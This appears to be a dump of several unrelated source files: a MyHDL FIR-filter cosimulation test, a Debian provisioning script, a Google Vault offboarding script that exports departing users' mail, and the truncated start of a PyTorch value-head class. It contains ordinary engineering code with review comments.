array.array('h', [0 for _ in range(args.Nsamps)]) yc1v = array.array('h', [0 for _ in range(args.Nsamps)]) yc2v = array.array('h', [0 for _ in range(args.Nsamps)]) @always(delay(3)) def tbclk(): clock.next = not clock @instance def tbstim(): reset.next = reset.active yield delay(33) reset.next = not reset.active yield clock.posedge yvals = [] for ii,xx in enumerate(xhrp): if ii < 16: print("%08X: x %7d: mm1 %7d, mm2 %7d, mb %7d, mc %7d" % \ (now(), x, ym1, ym2, yb1, yc1)) # set the next input and save all current outputs if ii >= args.Nsamps: break x.next = xx ym1v[ii],ym2v[ii] = ym1,ym2 yb1v[ii],yb2v[ii] = yb1,yb2 yc1v[ii],yc2v[ii] = yc1,yc2 yield clock.posedge # simulation complete inform the simulator raise StopSimulation print("start (co)simulation ...") Simulation((tbdut, tbstim, tbclk,)).run() colors = matplotlib.rcParams['axes.color_cycle'] fig,axl = plt.subplots(7, sharex=True, figsize=(12,7)) labels = ('input', 'bsv', '*', 'chisel', '**', 'myhdl', '***', ) xlen = len(xhrp) for ax,dd,cc,ll in zip(axl, (xhrp, yb1v, yb2v, yc1v, yc2v, ym1v, ym2v,), colors[:7], labels): ax.plot(dd, color=cc, linewidth=2) ax.set_ylim(imin, imax) ax.set_xlim(-500, xlen+100) ax.text(-450, 0, ll, color='#003366', fontsize=16, fontweight='bold') #ax.set_yticklabels([]) fig.subplots_adjust(hspace=0) for ax in axl: ax.set_yticks((imin/2,0,imax/2,)) ax.set_yticklabels(('-.5FS', '0', '.5FS',)) # save the figure if not os.path.exists("plots"): os.makedirs("plots") for ext in ('png','pdf',): fig.savefig("plots/mathsop_time_response.%s"%(ext)) if __name__ == '__main__': args = Namespace( Nsamps=1024*4, # number of samples to test Fs=1e3, # sample rate mmver=1, # two MyHDL versions trace=True # enable tracing ) test_mathsop_verilogs(args)
examples/ex4_mathsop/test_verilogs/test_mathsop.py
from __future__ import division from __future__ import print_function import os import argparse from argparse import Namespace import array import numpy as np from scipy import signal import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt from matplotlib import mlab from myhdl import * def _prep_cosim(args, **sigs): """ prepare the cosimulation environment """ # compile the verilog files with the verilog simulator files = ['../myhdl/mm_sop1.v', '../myhdl/mm_sop2.v', '../bsv/mkSOP1.v', '../bsv/mkSOP2.v', '../chisel/generated/mc_sop1.v', #'../chisel/generated/mc_sop2.v', './tb_mathsop.v',] print("compiling ...") cmd = "iverilog -o mathsop %s " % (" ".join(files)) print(" *%s" % (cmd)) os.system(cmd) # get the handle to the print("cosimulation setup ...") cmd = "vvp -m ./myhdl.vpi mathsop" if not os.path.exists("vcd"): os.makedirs("vcd") return Cosimulation(cmd, **sigs) def _create_chirp(args, imax=8): """generate a chirp signal, DUT input """ tarray = np.arange(args.Nsamps/2)*(1./args.Fs) # chirp(tarray, time zero freq, time end freq, end freq) xin = signal.chirp(tarray, 2, tarray[-1], 230, method=u'logarithmic') * .94 # chirp down and up xin = np.concatenate( (xin, np.array([-1*ss for ss in reversed(xin[:-1])]), -1*xin[:30], )) xin = map(int, [round(xx*imax) for xx in xin]) return xin def test_mathsop_verilogs(args): """the SOP (FIR filter) test stimulus """ clock = Signal(bool(0)) reset = ResetSignal(0, active=0, async=True) imin,imax = -2**15, 2**15 x = Signal(intbv(0, min=imin, max=imax)) (ym1,ym2, yb1,yb2, yc1,yc2,) = [Signal(intbv(0, min=imin, max=imax)) for _ in range(6)] tbdut = _prep_cosim(args, clock=clock, reset=reset, x=x, ym1=ym1, ym2=ym2, yb1=yb1, yb2=yb2, yc1=yc1, yc2=yc2) # create the inputs and output containers xhrp = _create_chirp(args, imax=imax) ym1v = array.array('h', [0 for _ in range(args.Nsamps)]) ym2v = array.array('h', [0 for _ in range(args.Nsamps)]) yb1v = array.array('h', [0 for _ in range(args.Nsamps)]) yb2v = 
array.array('h', [0 for _ in range(args.Nsamps)]) yc1v = array.array('h', [0 for _ in range(args.Nsamps)]) yc2v = array.array('h', [0 for _ in range(args.Nsamps)]) @always(delay(3)) def tbclk(): clock.next = not clock @instance def tbstim(): reset.next = reset.active yield delay(33) reset.next = not reset.active yield clock.posedge yvals = [] for ii,xx in enumerate(xhrp): if ii < 16: print("%08X: x %7d: mm1 %7d, mm2 %7d, mb %7d, mc %7d" % \ (now(), x, ym1, ym2, yb1, yc1)) # set the next input and save all current outputs if ii >= args.Nsamps: break x.next = xx ym1v[ii],ym2v[ii] = ym1,ym2 yb1v[ii],yb2v[ii] = yb1,yb2 yc1v[ii],yc2v[ii] = yc1,yc2 yield clock.posedge # simulation complete inform the simulator raise StopSimulation print("start (co)simulation ...") Simulation((tbdut, tbstim, tbclk,)).run() colors = matplotlib.rcParams['axes.color_cycle'] fig,axl = plt.subplots(7, sharex=True, figsize=(12,7)) labels = ('input', 'bsv', '*', 'chisel', '**', 'myhdl', '***', ) xlen = len(xhrp) for ax,dd,cc,ll in zip(axl, (xhrp, yb1v, yb2v, yc1v, yc2v, ym1v, ym2v,), colors[:7], labels): ax.plot(dd, color=cc, linewidth=2) ax.set_ylim(imin, imax) ax.set_xlim(-500, xlen+100) ax.text(-450, 0, ll, color='#003366', fontsize=16, fontweight='bold') #ax.set_yticklabels([]) fig.subplots_adjust(hspace=0) for ax in axl: ax.set_yticks((imin/2,0,imax/2,)) ax.set_yticklabels(('-.5FS', '0', '.5FS',)) # save the figure if not os.path.exists("plots"): os.makedirs("plots") for ext in ('png','pdf',): fig.savefig("plots/mathsop_time_response.%s"%(ext)) if __name__ == '__main__': args = Namespace( Nsamps=1024*4, # number of samples to test Fs=1e3, # sample rate mmver=1, # two MyHDL versions trace=True # enable tracing ) test_mathsop_verilogs(args)
0.524882
0.372448
from subprocess import call

import pexpect


class LinuxInit():
    """One-shot provisioning helper for a fresh Debian/Ubuntu machine.

    Steps (run in order by __main__): apt package installs driven through a
    sudo password prompt via pexpect, creation of a ~/lib working tree,
    pip installation of common libraries, and cloning of git repositories.

    SECURITY NOTE(review): the sudo password is hard-coded below as the
    placeholder "xxx".  Replace it (e.g. with getpass.getpass()) before any
    real use and never commit an actual password.
    """

    def __init__(self):
        pass

    # 0. Update sources and install the Python dev headers.
    def update_env(self):
        # cmd = "sudo apt-get update;sudo apt-get upgrade;sudo apt-get install -y python-dev"
        install_cmd = "sudo apt-get install -y python-dev"
        process = pexpect.spawn(install_cmd, timeout=30)
        # NOTE(review): this matches the literal text "sudo" in the password
        # prompt ("[sudo] password for ...") — verify against the actual prompt.
        process.expect("sudo")
        process.send("xxx\n")
        output = process.read()
        print(output)

    # 1. Create the ~/lib directory tree (tool/src/doc).
    def create_directory(self):
        cmd = "cd $HOME;mkdir lib;cd lib;mkdir tool src doc;ls -l"
        call(cmd, shell=True)
        call("ls -l", shell=True)

    # 2. Install software: git/vim/pip etc.
    # [done] getpass input password.
    def install_software(self):
        install_cmd = "sudo apt-get install -y git vim python-pip mongodb curl docker docker.io mysql-server mysql-client libmysqlclient-dev"
        process = pexpect.spawn(install_cmd, timeout=30)
        process.expect("sudo")
        process.send("xxx\n")
        output = process.read()
        print(output)

    # 3. pip-install third-party libraries.
    def pip_install(self):
        third_libs = ['wget', 'pep8', 'scrapy', 'paramiko', 'django',
                      'pymongo', 'selenium', 'mysql', 'numpy', 'pandas',
                      'tensorflow', 'testrepository', 'opencv-python',
                      'apidoc']
        for third_lib in third_libs:
            call("pip install " + third_lib, shell=True)

    # 4. Clone source repositories into ~/lib/src.
    def download_src(self):
        src_addr = ['<EMAIL>:Ethan16/python_misc.git',
                    '<EMAIL>:Ethan16/crawl.git',
                    '<EMAIL>:Ethan16/c_cpp_misc.git',
                    '<EMAIL>:Ethan16/tcl_misc.git',
                    '<EMAIL>:Ethan16/shell_misc.git',
                    '<EMAIL>:Ethan16/bat_ps_misc.git']
        public_addr = ['https://github.com/torvalds/linux.git',
                       'https://github.com/qemu/qemu.git',
                       'https://github.com/stanzhai/be-a-professional-programmer.git',
                       'https://github.com/jobbole/awesome-python-cn.git',
                       'https://github.com/scrapy/scrapy.git',
                       'https://github.com/SeleniumHQ/selenium.git',
                       'https://github.com/wangshub/Douyin-Bot.git',
                       'https://github.com/tensorflow/tensorflow.git',
                       'https://github.com/cuanboy/ScrapyProject.git']
        # call("cd $HOME/lib/src/")
        for src in src_addr + public_addr:
            call("cd $HOME/lib/src/;git clone " + src, shell=True)
        # BUG FIX: the original called call("ls -l") WITHOUT shell=True, which
        # tries to exec a program literally named "ls -l" and raises
        # FileNotFoundError.  Run it through the shell like every other call.
        call("ls -l", shell=True)


if __name__ == '__main__':
    init = LinuxInit()
    init.update_env()
    init.create_directory()
    init.install_software()
    init.pip_install()
    init.download_src()
linux_init/linux_init.py
from subprocess import call

import pexpect


class LinuxInit():
    """One-shot provisioning helper for a fresh Debian/Ubuntu machine.

    Steps (run in order by __main__): apt package installs driven through a
    sudo password prompt via pexpect, creation of a ~/lib working tree,
    pip installation of common libraries, and cloning of git repositories.

    SECURITY NOTE(review): the sudo password is hard-coded below as the
    placeholder "xxx".  Replace it (e.g. with getpass.getpass()) before any
    real use and never commit an actual password.
    """

    def __init__(self):
        pass

    # 0. Update sources and install the Python dev headers.
    def update_env(self):
        # cmd = "sudo apt-get update;sudo apt-get upgrade;sudo apt-get install -y python-dev"
        install_cmd = "sudo apt-get install -y python-dev"
        process = pexpect.spawn(install_cmd, timeout=30)
        # NOTE(review): this matches the literal text "sudo" in the password
        # prompt ("[sudo] password for ...") — verify against the actual prompt.
        process.expect("sudo")
        process.send("xxx\n")
        output = process.read()
        print(output)

    # 1. Create the ~/lib directory tree (tool/src/doc).
    def create_directory(self):
        cmd = "cd $HOME;mkdir lib;cd lib;mkdir tool src doc;ls -l"
        call(cmd, shell=True)
        call("ls -l", shell=True)

    # 2. Install software: git/vim/pip etc.
    # [done] getpass input password.
    def install_software(self):
        install_cmd = "sudo apt-get install -y git vim python-pip mongodb curl docker docker.io mysql-server mysql-client libmysqlclient-dev"
        process = pexpect.spawn(install_cmd, timeout=30)
        process.expect("sudo")
        process.send("xxx\n")
        output = process.read()
        print(output)

    # 3. pip-install third-party libraries.
    def pip_install(self):
        third_libs = ['wget', 'pep8', 'scrapy', 'paramiko', 'django',
                      'pymongo', 'selenium', 'mysql', 'numpy', 'pandas',
                      'tensorflow', 'testrepository', 'opencv-python',
                      'apidoc']
        for third_lib in third_libs:
            call("pip install " + third_lib, shell=True)

    # 4. Clone source repositories into ~/lib/src.
    def download_src(self):
        src_addr = ['<EMAIL>:Ethan16/python_misc.git',
                    '<EMAIL>:Ethan16/crawl.git',
                    '<EMAIL>:Ethan16/c_cpp_misc.git',
                    '<EMAIL>:Ethan16/tcl_misc.git',
                    '<EMAIL>:Ethan16/shell_misc.git',
                    '<EMAIL>:Ethan16/bat_ps_misc.git']
        public_addr = ['https://github.com/torvalds/linux.git',
                       'https://github.com/qemu/qemu.git',
                       'https://github.com/stanzhai/be-a-professional-programmer.git',
                       'https://github.com/jobbole/awesome-python-cn.git',
                       'https://github.com/scrapy/scrapy.git',
                       'https://github.com/SeleniumHQ/selenium.git',
                       'https://github.com/wangshub/Douyin-Bot.git',
                       'https://github.com/tensorflow/tensorflow.git',
                       'https://github.com/cuanboy/ScrapyProject.git']
        # call("cd $HOME/lib/src/")
        for src in src_addr + public_addr:
            call("cd $HOME/lib/src/;git clone " + src, shell=True)
        # BUG FIX: the original called call("ls -l") WITHOUT shell=True, which
        # tries to exec a program literally named "ls -l" and raises
        # FileNotFoundError.  Run it through the shell like every other call.
        call("ls -l", shell=True)


if __name__ == '__main__':
    init = LinuxInit()
    init.update_env()
    init.create_directory()
    init.install_software()
    init.pip_install()
    init.download_src()
0.280222
0.054224
import requests
import json
import sys

# Offboarding pipeline: for each leaving user, create a Google Vault matter,
# a saved search query over their mail, an MBOX export, grant admins access,
# and post the resulting links to a webhook.
#
# get the secrets from your Google Cloud project, use the Oauth2 Playground
# for your refresh token
client_id=sys.argv[1]
client_secret=sys.argv[2]
refresh_token=sys.argv[3]
# NOTE(review): 'credentials' is used below as the notification webhook URL — confirm.
credentials=sys.argv[4]


def get_list_from_file(filename):
    # Return the lines of *filename* as a list of strings.
    try:
        # open and read the file into list
        with open(filename) as f:
            string_list = f.read().splitlines()
            f.close()  # NOTE(review): redundant — the with-statement already closes f
        print(string_list)
        return string_list
    except:
        # NOTE(review): bare except masks the real error (even KeyboardInterrupt);
        # prefer `except OSError`.
        print("\033[1m"+"Issue Occured with obtaining list from file"+"\033[0m")
        sys.exit(1)


def generate_vault_access_token(client_id,client_secret,refresh_token):
    # Exchange the OAuth2 refresh token for a short-lived Vault access token.
    try:
        url = "https://www.googleapis.com/oauth2/v4/token"
        body = json.dumps({
            "client_id": client_id,
            "client_secret": client_secret,
            "refresh_token": refresh_token,
            "grant_type": "refresh_token"
        })
        headers = {
            "Accept" : "application/json",
            "Content-Type" : "application/json",
        }
        response = requests.request(
            "POST", url, headers=headers, data=body
        )
        jsonContent = json.loads(response.text)
        vaultAccessToken = jsonContent["access_token"]
        return vaultAccessToken
    except:
        print("\033[1m"+"Issue Occured with generating Google Vault Access Token"+"\033[0m")
        sys.exit(1)


def generate_matter(leaver_user,vaultAccessToken):
    # Create one Vault matter per user; return bookkeeping records of shape
    # {"matterInstance": {"user": ..., "userInfo": {matterID, savedQueryID, matterExportID}}}.
    try:
        matterList = []
        for user in leaver_user:
            url = "https://vault.googleapis.com/v1/matters/"
            headers = {
                "Accept" : "application/json",
                "Content-Type" : "application/json",
                "Authorization": "Bearer " + vaultAccessToken
            }
            body = json.dumps ({
                "state": "OPEN",
                "description": "Generated by Python",
                "name": user + "'s archive"
            })
            response = requests.request(
                "POST", url, headers=headers, data=body
            )
            jsonContent = json.loads(response.text)
            matterID=jsonContent["matterId"]
            #print("Matter ID for " + user + " is " + matterID)
            print(jsonContent)
            matterList.append({
                "matterInstance": {
                    "user": user,
                    "userInfo": {
                        "matterID": matterID,
                        "savedQueryID": "",
                        "matterExportID": ""
                    }
                }
            })
        return matterList
    except:
        print("\033[1m"+"Issue Occured with generating Google Vault Matter"+"\033[0m")
        sys.exit(1)


def generate_search_query(matterList,vaultAccessToken):
    # Create a saved mail-search query in each matter; returns updated records.
    try:
        for matter in matterList:
            # NOTE(review): re-binding matterList inside the loop discards all
            # previously accumulated records, so only the LAST matter's entry
            # survives into the returned list — looks unintended; verify.
            matterList = []
            for key, value in matter.items():
                user=(matter['matterInstance']['user'])
                matterID=(matter['matterInstance']['userInfo']['matterID'])
                url = "https://vault.googleapis.com/v1/matters/"+matterID+"/savedQueries"
                headers = {
                    "Accept" : "application/json",
                    "Content-Type" : "application/json",
                    "Authorization": "Bearer " + vaultAccessToken
                }
                body=json.dumps({
                    "displayName": user + "'s email search query",
                    "query": {
                        "corpus": "MAIL",
                        "dataScope": "ALL_DATA",
                        "searchMethod": "ACCOUNT",
                        "accountInfo": { "emails": [user]},
                        "mailOptions": {"excludeDrafts" : "false"},
                        "timeZone": "Atlantic/Canary",
                        "method": "ACCOUNT"
                    }}
                )
                response = requests.request(
                    "POST", url, headers=headers, data=body
                )
                jsonContent = json.loads(response.text)
                print(jsonContent)
                savedQueryID=jsonContent["savedQueryId"]
                #print("savedQueryId for " + user + " is " + savedQueryID + " matterID is " + matterID)
                matterList.append({
                    "matterInstance": {
                        "user": user,
                        "userInfo": {
                            "matterID": matterID,
                            "savedQueryID": savedQueryID,
                            "matterExportID": ""
                        }
                    }
                } )
        return matterList
    except:
        print("\033[1m"+"Issue Occured with generating Google Vault Matter Search Query"+"\033[0m")
        sys.exit(1)


def generate_export(savedQueryID,matterList,vaultAccessToken):
    # Kick off an MBOX export for each matter; returns updated records.
    # NOTE(review): the savedQueryID parameter is immediately shadowed below
    # by the per-record value — the parameter is effectively unused.
    try:
        for matter in matterList:
            # NOTE(review): same list re-binding issue as generate_search_query.
            matterList = []
            for key, value in matter.items():
                user=(matter['matterInstance']['user'])
                matterID=(matter['matterInstance']['userInfo']['matterID'])
                savedQueryID=(matter['matterInstance']['userInfo']['savedQueryID'])
                print(user,matterID,savedQueryID)
                # builds a tuple of fragments, then joins them into the URL
                url = "https://vault.googleapis.com/v1/matters/",matterID,"/exports"
                url=''.join(url)
                print(url)
                headers = {
                    "Accept" : "application/json",
                    "Content-Type" : "application/json",
                    "Authorization": "Bearer " + vaultAccessToken
                }
                body = json.dumps( {
                    "name": user + "'s Export",
                    "query": {
                        "corpus": "MAIL",
                        "dataScope": "ALL_DATA",
                        "searchMethod": "ACCOUNT",
                        "accountInfo": { "emails": [user]},
                        "mailOptions": {"excludeDrafts" : "false"},
                        "timeZone": "Atlantic/Canary",
                        "method": "Account",
                    },
                    "exportOptions": {
                        "mailOptions": {
                            "exportFormat": "MBOX",
                            "showConfidentialModeContent": "true"
                        },
                        "region": "any"
                    }
                } )
                response = requests.request(
                    "POST", url, headers=headers, data=body
                )
                jsonContent = json.loads(response.text)
                matterExportID=jsonContent["id"]
                print(jsonContent)
                #print("matterExportID for " + user + " is " + matterExportID + " searchQueryID is " + savedQueryID + " matterID is " + matterID)
                matterList.append({
                    "matterInstance": {
                        "user": user,
                        "userInfo": {
                            "matterID": matterID,
                            "savedQueryID": savedQueryID,
                            "matterExportID": matterExportID
                        }
                    }
                } )
        return matterList
    except:
        print("\033[1m"+"Issue Occured with generating Google Vault Matter Export"+"\033[0m")
        sys.exit(1)


def set_matter_permissions(adminAccountIDs,matterList,vaultAccessToken):
    # Grant each admin COLLABORATOR access on each matter.
    try:
        for matter in matterList:
            matterList = []   # NOTE(review): re-binding appears pointless here
            for key, value in matter.items():
                for each in adminAccountIDs:
                    print(each)
                    print(matterList)
                    matterID=(matter['matterInstance']['userInfo']['matterID'])
                    url = "https://vault.googleapis.com/v1/matters/",matterID,":addPermissions"
                    print(url)
                    url=''.join(url)
                    print(url)
                    headers = {
                        "Accept" : "application/json",
                        "Content-Type" : "application/json",
                        "Authorization": "Bearer " + vaultAccessToken
                    }
                    body = json.dumps( {
                        "matterPermission": {
                            "role": "COLLABORATOR",
                            "accountId": each
                        },
                        "sendEmails": "false",
                        "ccMe": "false"
                    } )
                    response = requests.request(
                        "POST", url, headers=headers, data=body
                    )
                    jsonContent = (response.text)
                    print(jsonContent)
        # returns the last admin account ID processed (caller names it last_admin)
        return each
    except:
        print("\033[1m"+"Issue Occured with setting Google Vault Matter permissions"+"\033[0m")
        sys.exit(1)


def generate_links_notify(matterList,credentials):
    # Print the Vault links for each matter and POST them to the webhook URL
    # passed in as *credentials*.
    try:
        for matter in matterList:
            matterList = []   # NOTE(review): re-binding appears pointless here
            user=(matter['matterInstance']['user'])
            matterID=(matter['matterInstance']['userInfo']['matterID'])
            savedQueryID=(matter['matterInstance']['userInfo']['savedQueryID'])
            exportID=(matter['matterInstance']['userInfo']['matterExportID'])
            print("************************************************************************************************************************************************************************************************************************************************************")
            print("Export Link for " + user + " https://vault.google.com/matter/"+ matterID + "/exports")
            print("Matter Link for " + user + " https://vault.google.com/matter/"+ matterID)
            print("Search Query Link for " + user + " https://vault.google.com/matter/"+ matterID + "/search")
            print("************************************************************************************************************************************************************************************************************************************************************")
            url=credentials
            body=json.dumps( {
                'text': "Export Link for " + user + " https://vault.google.com/matter/"+ matterID + "/exports"
            } )
            headers={
                'Content-type': 'application/json'
            }
            response = requests.request(
                "POST", url, data=body,
            )
    except:
        print("\033[1m"+"Issue Occured with generating links for notifications"+"\033[0m")
        sys.exit(1)


# --- driver: run the whole offboarding pipeline ---
vaultAccessToken=generate_vault_access_token(client_id,client_secret,refresh_token)
# NOTE(review): '.txt' placeholders — fill in the actual input file names.
input_filename='.txt'
leaver_user=get_list_from_file(input_filename)
adminAccountIDs='.txt'
admin_users=get_list_from_file(adminAccountIDs)
matter=generate_matter(leaver_user,vaultAccessToken)
savedQueryID=generate_search_query(matter,vaultAccessToken)
matterExportID=generate_export(savedQueryID,matter,vaultAccessToken)
last_admin=set_matter_permissions(admin_users,matter,vaultAccessToken)
generate_links_notify(matter,credentials)
google-workspace/offboarding-email-archive/python/google-vault-offboarding.py
import requests
import json
import sys

# Offboarding pipeline: for each leaving user, create a Google Vault matter,
# a saved search query over their mail, an MBOX export, grant admins access,
# and post the resulting links to a webhook.
#
# get the secrets from your Google Cloud project, use the Oauth2 Playground
# for your refresh token
client_id=sys.argv[1]
client_secret=sys.argv[2]
refresh_token=sys.argv[3]
# NOTE(review): 'credentials' is used below as the notification webhook URL — confirm.
credentials=sys.argv[4]


def get_list_from_file(filename):
    # Return the lines of *filename* as a list of strings.
    try:
        # open and read the file into list
        with open(filename) as f:
            string_list = f.read().splitlines()
            f.close()  # NOTE(review): redundant — the with-statement already closes f
        print(string_list)
        return string_list
    except:
        # NOTE(review): bare except masks the real error (even KeyboardInterrupt);
        # prefer `except OSError`.
        print("\033[1m"+"Issue Occured with obtaining list from file"+"\033[0m")
        sys.exit(1)


def generate_vault_access_token(client_id,client_secret,refresh_token):
    # Exchange the OAuth2 refresh token for a short-lived Vault access token.
    try:
        url = "https://www.googleapis.com/oauth2/v4/token"
        body = json.dumps({
            "client_id": client_id,
            "client_secret": client_secret,
            "refresh_token": refresh_token,
            "grant_type": "refresh_token"
        })
        headers = {
            "Accept" : "application/json",
            "Content-Type" : "application/json",
        }
        response = requests.request(
            "POST", url, headers=headers, data=body
        )
        jsonContent = json.loads(response.text)
        vaultAccessToken = jsonContent["access_token"]
        return vaultAccessToken
    except:
        print("\033[1m"+"Issue Occured with generating Google Vault Access Token"+"\033[0m")
        sys.exit(1)


def generate_matter(leaver_user,vaultAccessToken):
    # Create one Vault matter per user; return bookkeeping records of shape
    # {"matterInstance": {"user": ..., "userInfo": {matterID, savedQueryID, matterExportID}}}.
    try:
        matterList = []
        for user in leaver_user:
            url = "https://vault.googleapis.com/v1/matters/"
            headers = {
                "Accept" : "application/json",
                "Content-Type" : "application/json",
                "Authorization": "Bearer " + vaultAccessToken
            }
            body = json.dumps ({
                "state": "OPEN",
                "description": "Generated by Python",
                "name": user + "'s archive"
            })
            response = requests.request(
                "POST", url, headers=headers, data=body
            )
            jsonContent = json.loads(response.text)
            matterID=jsonContent["matterId"]
            #print("Matter ID for " + user + " is " + matterID)
            print(jsonContent)
            matterList.append({
                "matterInstance": {
                    "user": user,
                    "userInfo": {
                        "matterID": matterID,
                        "savedQueryID": "",
                        "matterExportID": ""
                    }
                }
            })
        return matterList
    except:
        print("\033[1m"+"Issue Occured with generating Google Vault Matter"+"\033[0m")
        sys.exit(1)


def generate_search_query(matterList,vaultAccessToken):
    # Create a saved mail-search query in each matter; returns updated records.
    try:
        for matter in matterList:
            # NOTE(review): re-binding matterList inside the loop discards all
            # previously accumulated records, so only the LAST matter's entry
            # survives into the returned list — looks unintended; verify.
            matterList = []
            for key, value in matter.items():
                user=(matter['matterInstance']['user'])
                matterID=(matter['matterInstance']['userInfo']['matterID'])
                url = "https://vault.googleapis.com/v1/matters/"+matterID+"/savedQueries"
                headers = {
                    "Accept" : "application/json",
                    "Content-Type" : "application/json",
                    "Authorization": "Bearer " + vaultAccessToken
                }
                body=json.dumps({
                    "displayName": user + "'s email search query",
                    "query": {
                        "corpus": "MAIL",
                        "dataScope": "ALL_DATA",
                        "searchMethod": "ACCOUNT",
                        "accountInfo": { "emails": [user]},
                        "mailOptions": {"excludeDrafts" : "false"},
                        "timeZone": "Atlantic/Canary",
                        "method": "ACCOUNT"
                    }}
                )
                response = requests.request(
                    "POST", url, headers=headers, data=body
                )
                jsonContent = json.loads(response.text)
                print(jsonContent)
                savedQueryID=jsonContent["savedQueryId"]
                #print("savedQueryId for " + user + " is " + savedQueryID + " matterID is " + matterID)
                matterList.append({
                    "matterInstance": {
                        "user": user,
                        "userInfo": {
                            "matterID": matterID,
                            "savedQueryID": savedQueryID,
                            "matterExportID": ""
                        }
                    }
                } )
        return matterList
    except:
        print("\033[1m"+"Issue Occured with generating Google Vault Matter Search Query"+"\033[0m")
        sys.exit(1)


def generate_export(savedQueryID,matterList,vaultAccessToken):
    # Kick off an MBOX export for each matter; returns updated records.
    # NOTE(review): the savedQueryID parameter is immediately shadowed below
    # by the per-record value — the parameter is effectively unused.
    try:
        for matter in matterList:
            # NOTE(review): same list re-binding issue as generate_search_query.
            matterList = []
            for key, value in matter.items():
                user=(matter['matterInstance']['user'])
                matterID=(matter['matterInstance']['userInfo']['matterID'])
                savedQueryID=(matter['matterInstance']['userInfo']['savedQueryID'])
                print(user,matterID,savedQueryID)
                # builds a tuple of fragments, then joins them into the URL
                url = "https://vault.googleapis.com/v1/matters/",matterID,"/exports"
                url=''.join(url)
                print(url)
                headers = {
                    "Accept" : "application/json",
                    "Content-Type" : "application/json",
                    "Authorization": "Bearer " + vaultAccessToken
                }
                body = json.dumps( {
                    "name": user + "'s Export",
                    "query": {
                        "corpus": "MAIL",
                        "dataScope": "ALL_DATA",
                        "searchMethod": "ACCOUNT",
                        "accountInfo": { "emails": [user]},
                        "mailOptions": {"excludeDrafts" : "false"},
                        "timeZone": "Atlantic/Canary",
                        "method": "Account",
                    },
                    "exportOptions": {
                        "mailOptions": {
                            "exportFormat": "MBOX",
                            "showConfidentialModeContent": "true"
                        },
                        "region": "any"
                    }
                } )
                response = requests.request(
                    "POST", url, headers=headers, data=body
                )
                jsonContent = json.loads(response.text)
                matterExportID=jsonContent["id"]
                print(jsonContent)
                #print("matterExportID for " + user + " is " + matterExportID + " searchQueryID is " + savedQueryID + " matterID is " + matterID)
                matterList.append({
                    "matterInstance": {
                        "user": user,
                        "userInfo": {
                            "matterID": matterID,
                            "savedQueryID": savedQueryID,
                            "matterExportID": matterExportID
                        }
                    }
                } )
        return matterList
    except:
        print("\033[1m"+"Issue Occured with generating Google Vault Matter Export"+"\033[0m")
        sys.exit(1)


def set_matter_permissions(adminAccountIDs,matterList,vaultAccessToken):
    # Grant each admin COLLABORATOR access on each matter.
    try:
        for matter in matterList:
            matterList = []   # NOTE(review): re-binding appears pointless here
            for key, value in matter.items():
                for each in adminAccountIDs:
                    print(each)
                    print(matterList)
                    matterID=(matter['matterInstance']['userInfo']['matterID'])
                    url = "https://vault.googleapis.com/v1/matters/",matterID,":addPermissions"
                    print(url)
                    url=''.join(url)
                    print(url)
                    headers = {
                        "Accept" : "application/json",
                        "Content-Type" : "application/json",
                        "Authorization": "Bearer " + vaultAccessToken
                    }
                    body = json.dumps( {
                        "matterPermission": {
                            "role": "COLLABORATOR",
                            "accountId": each
                        },
                        "sendEmails": "false",
                        "ccMe": "false"
                    } )
                    response = requests.request(
                        "POST", url, headers=headers, data=body
                    )
                    jsonContent = (response.text)
                    print(jsonContent)
        # returns the last admin account ID processed (caller names it last_admin)
        return each
    except:
        print("\033[1m"+"Issue Occured with setting Google Vault Matter permissions"+"\033[0m")
        sys.exit(1)


def generate_links_notify(matterList,credentials):
    # Print the Vault links for each matter and POST them to the webhook URL
    # passed in as *credentials*.
    try:
        for matter in matterList:
            matterList = []   # NOTE(review): re-binding appears pointless here
            user=(matter['matterInstance']['user'])
            matterID=(matter['matterInstance']['userInfo']['matterID'])
            savedQueryID=(matter['matterInstance']['userInfo']['savedQueryID'])
            exportID=(matter['matterInstance']['userInfo']['matterExportID'])
            print("************************************************************************************************************************************************************************************************************************************************************")
            print("Export Link for " + user + " https://vault.google.com/matter/"+ matterID + "/exports")
            print("Matter Link for " + user + " https://vault.google.com/matter/"+ matterID)
            print("Search Query Link for " + user + " https://vault.google.com/matter/"+ matterID + "/search")
            print("************************************************************************************************************************************************************************************************************************************************************")
            url=credentials
            body=json.dumps( {
                'text': "Export Link for " + user + " https://vault.google.com/matter/"+ matterID + "/exports"
            } )
            headers={
                'Content-type': 'application/json'
            }
            response = requests.request(
                "POST", url, data=body,
            )
    except:
        print("\033[1m"+"Issue Occured with generating links for notifications"+"\033[0m")
        sys.exit(1)


# --- driver: run the whole offboarding pipeline ---
vaultAccessToken=generate_vault_access_token(client_id,client_secret,refresh_token)
# NOTE(review): '.txt' placeholders — fill in the actual input file names.
input_filename='.txt'
leaver_user=get_list_from_file(input_filename)
adminAccountIDs='.txt'
admin_users=get_list_from_file(adminAccountIDs)
matter=generate_matter(leaver_user,vaultAccessToken)
savedQueryID=generate_search_query(matter,vaultAccessToken)
matterExportID=generate_export(savedQueryID,matter,vaultAccessToken)
last_admin=set_matter_permissions(admin_users,matter,vaultAccessToken)
generate_links_notify(matter,credentials)
0.056165
0.114517
from typing import Mapping, Any, Type, Callable, Optional

import abc

import torch as tc

from drl.agents.heads.abstract import Head
from drl.agents.architectures.stateless.abstract import HeadEligibleArchitecture


class ValueHead(Head, metaclass=abc.ABCMeta):
    """
    Abstract base class for value-estimation heads.
    """


class SimpleValueHead(ValueHead):
    """
    Value head that wraps a head-eligible architecture emitting one scalar
    value estimate per example.
    """
    def __init__(
            self,
            num_features: int,
            head_architecture_cls: Type[HeadEligibleArchitecture],
            head_architecture_cls_args: Mapping[str, Any],
            w_init: Optional[Callable[[tc.Tensor], None]],
            b_init: Optional[Callable[[tc.Tensor], None]],
            **kwargs: Mapping[str, Any]):
        """
        Args:
            num_features (int): Number of input features.
            head_architecture_cls (Type[HeadEligibleArchitecture]): Architecture
                class used to build the underlying network; must derive from
                HeadEligibleArchitecture.
            head_architecture_cls_args (Mapping[str, Any]): Extra keyword
                arguments forwarded to the architecture constructor.
            w_init (Callable[[torch.Tensor], None]): Weight initializer.
            b_init (Callable[[torch.Tensor], None]): Bias initializer.
            **kwargs (Mapping[str, Any]): Additional keyword arguments (unused).
        """
        super().__init__()
        # Build the underlying network with a single output unit; the
        # extra architecture kwargs are forwarded unchanged.
        network = head_architecture_cls(
            input_dim=num_features,
            output_dim=1,
            w_init=w_init,
            b_init=b_init,
            **head_architecture_cls_args)
        self._value_head = network

    def forward(
